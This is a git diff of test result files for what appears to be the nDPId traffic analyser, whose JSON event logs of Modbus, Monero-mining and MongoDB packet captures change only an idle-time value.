-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1223541953929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953929,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/5AAIAGEGfAqG6DwKhuiggaAfZB0urS4RU62VAY\/LsAJgAAANIAAAAGAQMAAAAB"} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7440000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1223541953927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953927,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/1AAIAGEGjAqG6DwKhuiggaAfZB0urG4RU6zlAY\/MYAMgAAANEAAAAGAQMAAQAB"} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1223541953927,"flow_last_seen":1223541953927,"flow_idle_time":7560000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1223541953927,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1223541953929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1223541953929,"pkt":"AArkxYMKABzAX0kKCABFAAAzO9pAAIAGYIzAqG6KwKhugwH2CBrhFTrOQdLq0lAY++v\/BAAAANEAAAAFAQMCAAA="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1223541953929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1223541953929,"pkt":"ABzAX0kKAArkxYMKCABFAAA0i\/5AAIAGEGfAqG6DwKhuiggaAfZB0urS4RU62VAY\/LsAJgAAANIAAAAGAQMAAAAB"} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":102,"flow_first_seen":1223541953927,"flow_last_seen":1223541977037,"flow_idle_time":7560000,"flow_min_l4_payload_len":11,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":1173,"flow_avg_l4_payload_len":11,"midstream":1,"thread_ts_msec":1223541977037,"l3_proto":"ip4","src_ip":"192.168.110.131","dst_ip":"192.168.110.138","src_port":2074,"dst_port":502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Modbus","breed":"Acceptable","category":"IoT-Scada"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":102,"source":"modbus.pcap","alias":"nDPId-test","packets-captured":102,"packets-processed":102,"total-skipped-flows":0,"total-l4-data-len":1173,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1223541977037} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 102/102 diff --git a/test/results/monero.pcap.out b/test/results/monero.pcap.out index 10eed2dd0..68e7445fb 100644 --- a/test/results/monero.pcap.out +++ b/test/results/monero.pcap.out 
@@ -1,18 +1,18 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"monero.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1514196188350} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196188350,"flow_last_seen":1514196188350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196188350,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196188350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188350,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8e7pAAEAG1e7AqAKUXhfHv7b2DQVL2\/baAAAAAKACchDZewAAAgQFtAQCCAocofANAAAAAAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188430,"pkt":"cIXCQ0+ifmgbW\/gUCABF4AA8AABAADEGX8leF8e\/wKgClA0FtvbB2Ar1S9v226AScSCYUwAAAgQFtAQCCArnhI20HKHwDQEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196188430,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA0e7tAAEAG1fXAqAKUXhfHv7b2DQVL2\/bbwdgK9oAQAOU3CgAAAQEIChyh8F7nhI20"} -00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196196437,"flow_last_seen":1514196196437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196196437,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1514196196437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196196437,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8ltZAAEAGxBLAqAKUdNOnw9JWDQXzKAOTAAAAAKACchCvSQAAAgQFtAQCCAqVhds1AAAAAAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196196745,"pkt":"cIXCQ0+ifmgbW\/gUCABFAAA0AABAACEGefF006fDwKgClA0F0lYVgl9O8ygDlIASchDSRAAAAgQFpAEBBAIBAwMH"} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1514196196745,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAAoltdAAEAGxCXAqAKUdNOnw9JWDQXzKAOUFYJfT1AQAOWEMgAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196188350,"flow_last_seen":1514196188350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196188350,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196188350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188350,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8e7pAAEAG1e7AqAKUXhfHv7b2DQVL2\/baAAAAAKACchDZewAAAgQFtAQCCAocofANAAAAAAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196188430,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196188430,"pkt":"cIXCQ0+ifmgbW\/gUCABF4AA8AABAADEGX8leF8e\/wKgClA0FtvbB2Ar1S9v226AScSCYUwAAAgQFtAQCCArnhI20HKHwDQEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196188430,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196188430,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA0e7tAAEAG1fXAqAKUXhfHv7b2DQVL2\/bbwdgK9oAQAOU3CgAAAQEIChyh8F7nhI20"} +00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196196437,"flow_last_seen":1514196196437,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196196437,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1514196196437,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196196437,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8ltZAAEAGxBLAqAKUdNOnw9JWDQXzKAOTAAAAAKACchCvSQAAAgQFtAQCCAqVhds1AAAAAAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1514196196745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196196745,"pkt":"cIXCQ0+ifmgbW\/gUCABFAAA0AABAACEGefF006fDwKgClA0F0lYVgl9O8ygDlIASchDSRAAAAgQFpAEBBAIBAwMH"} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1514196196745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1514196196745,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAAoltdAAEAGxCXAqAKUdNOnw9JWDQXzKAOUFYJfT1AQAOWEMgAA"} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":199,"source":"monero.pcap","alias":"nDPId-test","packets-captured":199,"packets-processed":198,"total-skipped-flows":0,"total-l4-data-len":82647,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1514196819733} 
-00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00929{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","packets-captured":319,"packets-processed":319,"total-skipped-flows":0,"total-l4-data-len":146090,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1514197279769} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 319/319 diff --git a/test/results/mongodb.pcap.out b/test/results/mongodb.pcap.out index a1682af59..a1a449ec9 100644 --- a/test/results/mongodb.pcap.out +++ b/test/results/mongodb.pcap.out 
@@ -1,39 +1,39 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mongodb.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1483459978959} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483459978959,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483459978959,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQHp6QAA\/BrGvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1483459978959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQHp6QAA+BrKvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1483459979210,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483459979210,"pkt":"ABsXAAIwACKDPxfFgQABLAgARQAAPAAAQAA1BjYuCgoKCwoKCgppicpuPpqGQZhs7COgEmjf5dgAAAIEBSYEAggKXOpDgG\/8XGwBAwMH"} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 